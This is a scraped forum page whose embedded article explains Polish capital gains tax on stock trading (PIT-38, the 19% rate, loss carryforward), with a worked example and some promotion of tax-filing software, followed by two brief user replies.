<div class="message-userContent lbContainer js-lbContainer " data-lb-id="post-149313" data-lb-caption-desc="inu · 22 Sty 2017 o 04:15">
<article class="message-body js-selectToQuote">
<div class="bbWrapper">W sumie ciekawe</div>
<div class="js-selectToQuoteEnd">&nbsp;</div>
</article>
</div>
</div>
<footer class="message-footer">
<div class="reactionsBar js-reactionsList ">
</div>
<div class="js-historyTarget message-historyTarget toggleTarget" data-href="trigger-href"></div>
</footer>
</div>
</div>
</div>
</article>
<article class="message message--post js-post js-inlineModContainer  " data-author="Martyna553" data-content="post-150014" id="js-post-150014">
<span class="u-anchorTarget" id="post-150014"></span>
<div class="message-inner">
<div class="message-cell message-cell--user">
<section itemscope="" itemtype="https://schema.org/Person" class="message-user">
<div class="message-avatar ">
<div class="message-avatar-wrapper">
<span class="avatar avatar--m avatar--default avatar--default--dynamic" data-user-id="0" style="background-color: #a36629; color: #e6bf99">
<span class="avatar-u0-m">M</span>
</span>
</div>
</div>
<div class="message-userDetails">
<h4 class="message-name"><span class="username " dir="auto" data-user-id="0" itemprop="name">Martyna553</span></h4>
<h5 class="userTitle message-userTitle" dir="auto" itemprop="jobTitle">Gość</h5>
</div>
<span class="message-userArrow"></span>
</section>
</div>
<div class="message-cell message-cell--main">
<div class="message-main js-quickEditTarget">
<header class="message-attribution message-attribution--split">
<div class="message-attribution-main">
<a href="/threads/podatek-od-gry-na-gieldzie.18786/post-150014" class="u-concealed" rel="nofollow">
<time class="u-dt" dir="auto" datetime="2017-01-28T08:53:26+0100" data-time="1485590006" data-date-string="28 Sty 2017" data-time-string="08:53" title="28 Sty 2017 o 08:53">28 Sty 2017</time>
</a>
</div>
<ul class="message-attribution-opposite message-attribution-opposite--list">
<li>
<a href="/threads/podatek-od-gry-na-gieldzie.18786/post-150014" data-xf-init="share-tooltip" data-href="/posts/150014/share" rel="nofollow" id="js-XFUniqueId8">
<i class="fa--xf far fa-share-alt" aria-hidden=""></i>
</a>
</li>
<li>
<a href="/threads/podatek-od-gry-na-gieldzie.18786/post-150014" rel="nofollow">
#3
</a>
</li>
</ul>
</header>
<div class="message-content js-messageContent">
<div class="message-userContent lbContainer js-lbContainer " data-lb-id="post-150014" data-lb-caption-desc="Martyna553 · 28 Sty 2017 o 08:53">
<article class="message-body js-selectToQuote">
<div class="bbWrapper">Ciekawe, długo sie czyta xDD:like:</div>
<div class="js-selectToQuoteEnd">&nbsp;</div>
</article>
</div>
</div>
<footer class="message-footer">
<div class="reactionsBar js-reactionsList ">
</div>
<div class="js-historyTarget message-historyTarget toggleTarget" data-href="trigger-href"></div>
</footer>
</div>
</div>
</div>
</article>
</div>
</div>
<div class="block-outer block-outer--after">
<div class="block-outer-opposite">
<a href="/login/" class="button--link button" data-xf-click="overlay"><span class="button-text">
Musisz się zalogować lub zarejestrować, aby odpowiedzieć w tym temacie.
</span></a>
</div>
</div>
</div>
<div class="blockMessage blockMessage--none">
</div>
</div>
</div>
</div>
<ul class="p-breadcrumbs p-breadcrumbs--bottom" itemscope="" itemtype="https://schema.org/BreadcrumbList">
<li itemprop="itemListElement" itemscope="" itemtype="https://schema.org/ListItem">
<a href="https://www.gamesboard.pl/portal/" itemprop="item">
<span itemprop="name">Strona główna</span>
</a>
</li>
<li itemprop="itemListElement" itemscope="" itemtype="https://schema.org/ListItem">
<a href="/" itemprop="item">
<span itemprop="name">Forum</span>
</a>
</li>
<li itemprop="itemListElement" itemscope="" itemtype="https://schema.org/ListItem">
<a href="/.#gamesboard-pl.410" itemprop="item">
<span itemprop="name">GamesBoard.pl</span>
</a>
</li>
<li itemprop="itemListElement" itemscope="" itemtype="https://schema.org/ListItem">
<a href="/forums/news-room.298/" itemprop="item">
<span itemprop="name">News Room</span>
</a>
</li>
</ul>
</div>
</div>
<footer class="p-footer" id="footer" style="margin-bottom: 77px;">
<div class="p-footer-inner">
<div class="p-footer-row">
<div class="p-footer-row-opposite">
<ul class="p-footer-linkList">
<li><a href="/misc/contact/" data-xf-click="overlay">Kontakt</a></li>
<li><a href="/help/terms/">Regulamin</a></li>
<li><a href="/help/privacy-policy/">Polityka prywatności</a></li>
<li><a href="/help/">Pomoc</a></li>
<li><a href="https://www.gamesboard.pl/portal">Strona główna</a></li>
<li><a href="/forums/-/index.rss" target="_blank" class="p-footer-rssLink" title="RSS"><span aria-hidden="true"><i class="fa fa-rss"></i><span class="u-srOnly">RSS</span></span></a></li>
</ul>
</div>
</div>
</div>
</footer>

<div class="raszpla">
<div class="cusfootwid">
<div class="cusfootpad">
<div class="block" data-widget-id="7" data-widget-key="forum_overview_forum_statistics" data-widget-definition="forum_statistics">
<div class="block-container">
<h3 class="block-minorHeader">Statystyki forum</h3>
<div class="block-body block-row">
<dl class="pairs pairs--justified">
<dt>Wątków</dt>
<dd>19,536</dd>
</dl>
<dl class="pairs pairs--justified">
<dt>Wiadomości</dt>
<dd>156,665</dd>
</dl>
<dl class="pairs pairs--justified">
<dt>Użytkownicy</dt>
<dd>8,301</dd>
</dl>
<dl class="pairs pairs--justified">
<dt>Najnowszy użytkownik</dt>
<dd><a href="/members/bronhilda.35288/" class="username " dir="auto" data-user-id="35288" data-xf-init="member-tooltip" id="js-XFUniqueId9">BronHilda</a></dd>
</dl>
</div>
</div>
</div>
</div>
</div>
<div class="cusfootwid">
<div class="cusfootpad">
<h2>
Premium news
</h2>
<span class="custom-panel">
<li><a href="https://www.gamesboard.pl/portal/naga-virtual-czyli-pierwszy-na-swiecie-rynek-dobr-wirtualnych/">NAGA VIRTUAL</a> - artykuł o wirtualnym rynku</li>
</span>
</div>
</div>
<div class="cusfootwid">
<div class="cusfootpad">
<h2>
Reklama
</h2>
<span class="custom-panel">
W tym miejscu wyświetli się reklama.
</span>
</div>
</div>
<div class="cusfootwid">
<div class="cusfootpad">
<div class="block" data-widget-section="onlineNow" data-widget-id="6" data-widget-key="forum_overview_members_online" data-widget-definition="members_online">
<div class="block-container">
<h3 class="block-minorHeader"><a href="/online/">Użytkownicy online</a></h3>
<div class="block-body">
<div class="block-row block-row--minor">
No members online now.
</div>
</div>
<div class="block-footer">
<span class="block-footer-counter">Łącznie:&nbsp;138 (użytkowników:&nbsp;0, gości:&nbsp;138)</span>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="p-footer-copyright">
<a href="https://xenforo.com" class="u-concealed" dir="ltr" target="_blank">Forum software by XenForo™ <span class="copyright">© 2010-2018 XenForo Ltd.</span></a>
<br><b>EXPerience</b> Theme created by <a href="https://www.stylesfactory.pl">StylesFactory.pl</a>
</div>
</div> 
</div><script async="" src="//ustat.info/15455128.nvqyqrcjhztgyhrrXkwakvxm99295x" type="text/javascript"></script>
<div class="u-bottomFixer js-bottomFixTarget">
<ul class="notices notices--bottom_fixer js-notices" data-xf-init="notices" data-type="bottom_fixer" data-scroll-interval="6">
<li class="notice js-notice notice--primary notice--cookie" data-notice-id="-1" data-delay-duration="0" data-display-duration="0" data-auto-dismiss="0" data-visibility="">
<div class="notice-content">
<div class="u-alignCenter">
Ta strona używa cookies. Jeśli chcesz używać wszystkich opcji na stronie, zaakceptuj warunki używania cookies.
</div>
<div class="u-inputSpacer u-alignCenter">
<a href="/account/dismiss-notice" class="js-noticeDismiss button--notice button button--icon button--icon--confirm" data-xf-init="tooltip" data-original-title="Dismiss Notice" id="js-XFUniqueId10"><span class="button-text">Akceptuj</span></a>
<a href="/help/cookies" class="button--notice button"><span class="button-text">Dowiedz się więcej…</span></a>
</div>
</div>
</li>
</ul>
</div>
<div class="u-scrollButtons js-scrollButtons" data-trigger-type="up">
<a href="#top" class="button--scroll button" data-xf-click="scroll-to"><span class="button-text"><i class="fa fa-arrow-up"></i><span class="u-srOnly">Początek strony</span></span></a>
</div>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script><script>window.jQuery || document.write('<script src="/js/vendor/jquery/jquery-3.3.1.min.js?_v=1eae5c98"><\/script>')</script>
<script src="/js/vendor/vendor-compiled.js?_v=1eae5c98"></script>
<script src="/js/xf/core-compiled.js?_v=1eae5c98"></script>
<script src="/js/xf/notice.min.js?_v=1eae5c98"></script>
<script>

		$('.thxpress_searchToggle input').on('change', function(event) {
			var container = $(event.currentTarget).closest('.thxpress_searchToggle'),
				elem = container.find('input:checked'),
				value = elem.val(),
				url = value == 'xenforo' ? 'https://www.gamesboard.pl/search/search' : 'https://www.gamesboard.pl/portal',
				method = value == 'xenforo' ? 'post' : 'get',
				inputName = value == 'xenforo' ? 'keywords' : 's',
				forms = $("form[data-xf-init='quick-search']"),
				inputField = forms.find("input[name='s'], input[name='keywords']");

			forms.attr('action', url).attr('method', method);
			inputField.attr('name', inputName);
			container.find('.wp-menu-row')[value == 'xenforo' ? 'hide' : 'show']();
			container.nextAll('.menu-row')[value == 'xenforo' ? 'show' : 'hide']();
		});
		
		
	
</script>
<script>
		jQuery.extend(true, XF.config, {
			// 
			userId: 0,
			enablePush: true,
			pushAppServerKey: 'BIuFc3ajL39/dTtI4V432tkohPnSBFcnaRJbdPmM/nX68A4MVVMigwq4kVS/j7xrAtz3dPJ83yuIrEj28BBXxTY=',
			url: {
				fullBase: 'https://www.gamesboard.pl/',
				basePath: '/',
				css: '/css.php?css=__SENTINEL__&s=30&l=1&d=1544478052',
				keepAlive: '/login/keep-alive'
			},
			cookie: {
				path: '/',
				domain: '',
				prefix: 'xf_',
				secure: true
			},
			csrf: '1544488913,21be7882279c8ce3cca1c85394c127fc',
			js: {"\/js\/xf\/notice.min.js?_v=1eae5c98":true},
			css: {"public:experience.css":true,"public:message.less":true,"public:notices.less":true,"public:thxpress_xf.less":true,"public:xp_custommenu.css":true,"public:xp_twitch.css":true,"public:xp_youtube.css":true,"public:extra.less":true},
			time: {
				now: 1544488913,
				today: 1544482800,
				todayDow: 2
			},
			borderSizeFeature: '3px',
			fontAwesomeWeight: 'r',
			enableRtnProtect: true,
			enableFormSubmitSticky: true,
			uploadMaxFilesize: 2097152,
			allowedVideoExtensions: ["m4v","mov","mp4","mp4v","mpeg","mpg","ogv","webm"],
			shortcodeToEmoji: true,
			visitorCounts: {
				conversations_unread: '0',
				alerts_unread: '0',
				total_unread: '0',
				title_count: true,
				icon_indicator: true
			},
			jsState: {},
			publicMetadataLogoUrl: '',
			publicPushBadgeUrl: 'https://www.gamesboard.pl/styles/default/xenforo/bell.png'
		});

		jQuery.extend(XF.phrases, {
			// 
			date_x_at_time_y: "{date} o {time}",
			day_x_at_time_y:  "{day} o {time}",
			yesterday_at_x:   "Wczoraj o {time}",
			x_minutes_ago:    "{minutes} minut temu",
			one_minute_ago:   "minutę temu",
			a_moment_ago:     "przed chwilą",
			today_at_x:       "Dzisiaj o {time}",
			in_a_moment:      "In a moment",
			in_a_minute:      "Za minutę",
			in_x_minutes:     "Za {minutes} minut",
			later_today_at_x: "Dzisiaj o {time}",
			tomorrow_at_x:    "Jutro o {time}",

			day0: "Niedziela",
			day1: "Poniedziałek",
			day2: "Wtorek",
			day3: "Środa",
			day4: "Czwartek",
			day5: "Piątek",
			day6: "Sobota",

			dayShort0: "Nie",
			dayShort1: "Pon",
			dayShort2: "Wt",
			dayShort3: "Śr",
			dayShort4: "Czw",
			dayShort5: "Pt",
			dayShort6: "Sob",

			month0: "Styczeń",
			month1: "Luty",
			month2: "Marzec",
			month3: "Kwiecień",
			month4: "Maj",
			month5: "Czerwiec",
			month6: "Lipiec",
			month7: "Sierpień",
			month8: "Wrzesień",
			month9: "Październik",
			month10: "Listopad",
			month11: "Grudzień",

			active_user_changed_reload_page: "The active user has changed. Reload the page for the latest version.",
			server_did_not_respond_in_time_try_again: "Serwer nie odpowiada. Spróbuj ponownie.",
			oops_we_ran_into_some_problems: "Ups! Pojawiły się pewne problemy.",
			oops_we_ran_into_some_problems_more_details_console: "Oops! We ran into some problems. Please try again later. More error details may be in the browser console.",
			file_too_large_to_upload: "The file is too large to be uploaded.",
			uploaded_file_is_too_large_for_server_to_process: "Wysłany plik jest zbyt duży.",
			files_being_uploaded_are_you_sure: "Files are still being uploaded. Are you sure you want to submit this form?",
			attach: "Załącz pliki",
			rich_text_box: "Pole tekstowe",
			close: "Zamknij",
			link_copied_to_clipboard: "Link skopiowany do schowka.",
			text_copied_to_clipboard: "Text copied to clipboard.",
			loading: "Ładowanie…",

			processing: "Processing",
			'processing...': "Processing…",

			showing_x_of_y_items: "Wyświetlono {count} z {total} pozycji",
			showing_all_items: "Showing all items",
			no_items_to_display: "No items to display",

			push_enable_notification_title: "Push notifications enabled successfully at GamesBoard.pl - forum o grach",
			push_enable_notification_body: "Thank you for enabling push notifications!"
		});
	</script>
<form style="display:none" hidden="hidden">
<input type="text" name="_xfClientLoadTime" value="" id="_xfClientLoadTime" title="_xfClientLoadTime" tabindex="-1">
</form>
<script type="text/template" id="xfReactTooltipTemplate">
				<div class="tooltip-content-inner">
					<div class="reactTooltip">
						
							<a href="#" class="reaction reaction--1" data-reaction-id="1"><i></i><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" class="reaction-sprite js-reaction" title="Lubię" data-xf-init="tooltip" /></a>
						
							<a href="#" class="reaction reaction--2" data-reaction-id="2"><i></i><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" class="reaction-sprite js-reaction" title="Kocham to!" data-xf-init="tooltip" /></a>
						
							<a href="#" class="reaction reaction--3" data-reaction-id="3"><i></i><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" class="reaction-sprite js-reaction" title="Haha" data-xf-init="tooltip" /></a>
						
							<a href="#" class="reaction reaction--4" data-reaction-id="4"><i></i><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" class="reaction-sprite js-reaction" title="Wow" data-xf-init="tooltip" /></a>
						
							<a href="#" class="reaction reaction--5" data-reaction-id="5"><i></i><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" class="reaction-sprite js-reaction" title="Smutne" data-xf-init="tooltip" /></a>
						
							<a href="#" class="reaction reaction--6" data-reaction-id="6"><i></i><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" class="reaction-sprite js-reaction" title="Wściekły" data-xf-init="tooltip" /></a>
						
					</div>
				</div>
			</script>
<script type="application/ld+json">
		{
			"@context": "https://schema.org",
			"@type": "DiscussionForumPosting",
			"@id": "https:\/\/www.gamesboard.pl\/threads\/podatek-od-gry-na-gieldzie.18786\/",
			"headline": "Podatek od gry na giełdzie",
			"articleBody": "Gra na giełdzie kapitałowej przynosi raz zyski, a raz straty. Mimo to wiele osób, licząc na zyski większe niż np. z lokat bankowych, inwestuje  w akcje lub inne instrumenty finansowe. Dochody\/straty uzyskane na giełdzie należy wykazać w rocznym zeznaniu podatkowym.\n\nPIT od dochodów kapitałowych\nPodatek od dochodów kapitałowych, zwany też podatkiem Belki, wynosi 19 %. Taka jest stawka podatku od dochodu uzyskanego m.in. na lokatach bankowych, rachunkach oszczędnościowych, giełdzie (akcje, obligacje), czy rynku forex.\n\nPodatek od lokat czy depozytów bankowych jest potrącany automatycznie przy kapitalizacji odsetek, odprowadzany do fiskusa przez instytucje finansowe, i nie musimy go wykazywać w rocznych pitach. Podobnie jest z dywidendami. Wypłacane są już po potrąceniu 19% podatku. Natomiast w przypadku inwestycji giełdowych, czy na rynku walutowym, musimy samodzielnie dokonywać rozliczenia z fiskusem.  Do rozliczeń możemy wykorzystać pitax.pl\/program-pit.\n\nDochody kapitałowe wykazujemy dopiero po zakończeniu roku podatkowego. Od dochodów giełdowych nie odprowadza się podatku w trakcie roku.. Ich zmienność powoduje, że końcowy wynik roczny może być zarówno dodatni, jak i ujemny. W każdym przypadku jednak jesteśmy zobowiązani złożyć deklarację rozliczeniową. Wykazanie straty może okazać się dla nas o tyle korzystne, że pozwoli na odliczenie tej straty od dochodu uzyskanego w następnych latach.\n\nNa rozliczenie się z fiskusem mamy czas do końca kwietnia roku następującego po roku podatkowym. Jeśli ostatni dzień kwietnia wypada w dzień wolny od pracy, termin ten przenosi się na pierwszy dzień roboczy po tym dniu. Tak jest właśnie w tym roku i pity 2017 składamy do 2 maja. W terminie tym należy złożyć deklarację PIT-38 oraz zapłacić należny podatek. Program pit pomoże w wypełnianiu deklaracji i obliczeniu należnego podatku.\n\nSposób obliczenia podatku\nFormularz podatkowy PIT-38 wypełniamy na podstawie otrzymanej z biura maklerskiego rocznej informacji PIT-8C. Informacje PIT-8C sporządzane są przez biura maklerskie i wysyłane do podatników oraz do urzędów skarbowych do końca lutego roku następnego po roku podatkowym.\n\nW przypadku gdy posiadamy kilka rachunków inwestycyjnych i otrzymamy kilka formularzy PIT8-C, musimy zsumować i wykazać w PIT-38 kwoty ze wszystkich źródeł. Sumujemy tylko zyski kapitałowe. Nie dodajemy do nich dochodów opodatkowanych na innych zasadach, np. według skali podatkowej albo ryczałtem od przychodów ewidencjonowanych. Tak samo nie możemy zysków z giełdy doliczyć do dochodów wykazywanych w innych deklaracjach, np. PIT 36 czy PIT 28.\n\nPodatek od zysków uzyskanych z inwestycji giełdowych obliczamy od podstawy opodatkowania, którą uzyskujemy po odjęciu od kwoty przychodów kosztów ich uzyskania.\n\nPrzykład:\n\nPan Andrzej sprzedał 1000 akcji spółki giełdowej , które wcześniej zakupił za pośrednictwem biura maklerskiego.  Cena sprzedaży wynosiła 40 pln sztukę, a zakupu 29 pln.Przy zakupie oraz sprzedaży biuro maklerskie pobrało prowizję, łącznie wyniosła ona 1000 pln. Przychód pana Andrzeja to 40 000 pln, koszty jego uzyskania - 30 000 pln. Dochód (czyli różnica między przychodem a kosztami) wynosi 10000 pln i od takiej kwoty 19% podatek wynosi 1900 pln.\n\nRozliczanie strat z inwestycji\nDeklarację roczną PIT 38 składamy zarówno wtedy, gdy osiągnęliśmy zyski, jak i wtedy, gdy ponieśliśmy stratę. Wykazaną stratę możemy rozliczać w ciągu pięciu kolejnych lat pod warunkiem, że uzyskamy dochody, od których można będzie ją odliczyć. Stratę można odliczyć tylko od dochodów z tego samego źródła, z którego powstała. Nie można więc odjąć straty z inwestycji giełdowych np. od dochodu z wynagrodzenia za pracę. Stratę wykazaną w PIT 38 możemy rozliczyć tylko w PIT 38. W każdym z pięciu lat nie można odliczyć więcej niż 50%. Przy dobrej koniunkturze stratę można odliczyć już w ciągu 2 lat (50%+50%). Jeśli jednak przez pięć lat dochody nie pozwolą na rozliczenie straty, w późniejszych latach nie będzie to możliwe.\n\nWycena akcji a podatek\nJeśli wartość kupionych przez nas akcji wzrosła, ale ich nie sprzedaliśmy, nie płacimy podatku od zysku. Jak wiemy wartość akcji jest zmienna. Do rozliczenia podatkowego istotna jest wartość, jaką uzyskamy ze sprzedaży.   Obowiązek rozliczenia i zapłaty podatku od gry na giełdzie powstaje dopiero w momencie sprzedaży akcji. Tak długo jak akcje nie są sprzedane, nie wypełniamy PIT-a i nie płacimy podatku. Nawet jeśli ich wartość znacznie wzrosła..\n\nPodatek od dochodów giełdowych płacimy po zakończeniu roku podatkowego, w którym zbyliśmy akcje.Wykazujemy wtedy zysk albo stratę.\n\nOdliczenie kosztów\nPodatek obliczany jest od dochodu, czyli różnicy między przychodami, a kosztami. Kwota podatku jest tym niższa, im wyższe są koszty.\n\nZgodnie ze stanowiskiem Ministerstwa Finansów kosztem uzyskania przychodu przy ustalaniu dochodu z odpłatnego zbycia akcji oraz innych papierów wartościowych są wydatki poniesione na:\n\n\nnabycie papierów wartościowych (cena jednostkowa x ilość papierów wartościowych),\nobsługę rachunku inwestycyjnego.\n\n\n\n\n\nGłównym kosztem jest cena nabycia akcji. Poza tym prowizje i inne opłaty pobierane przez biuro maklerskie, powinny być już uwzględnione w dokumencie PIT-8C, który dostaliśmy od biura maklerskiego.\n\nPozostałe koszty (np. odsetki i prowizje od kredytów giełdowych) nie są uwzględnione w PIT 8C, ale możemy uwzględnić je sami w rozliczeniu rocznym. W tym przypadku warto potwierdzić koszty do odliczenia we właściwym urzędzie skarbowym.\n\nSposób rozliczenia PIT\nDeklarację PIT-38 możemy wypełnić odręcznie albo korzystając z programu PITax.pl Łatwe podatki rozliczyc pit przez internet. Rozliczenie pit online.jest proste i zajmuje niewiele czasu. Korzystając z programu pit unikniemy błędów rachunkowych i formalnych. Po poprawnym wysłaniu zeznania przez program pit urząd skarbowy potwierdza jego otrzymanie Urzędowym Poświadczeniem Odbioru.",
			"articleSection": "News Room",
			"author": {
				"@type": "Person",
				"name": "Matti"
			},
			"datePublished": "2017-01-21",
			"dateModified": "2017-01-28",
			"image": "https:\/\/www.gamesboard.pl\/data\/avatars\/l\/0\/1.jpg?1542808550",
			"interactionStatistic": {
				"@type": "InteractionCounter",
				"interactionType": "https://schema.org/ReplyAction",
				"userInteractionCount": 2
			}
		}
		</script>


</body></html>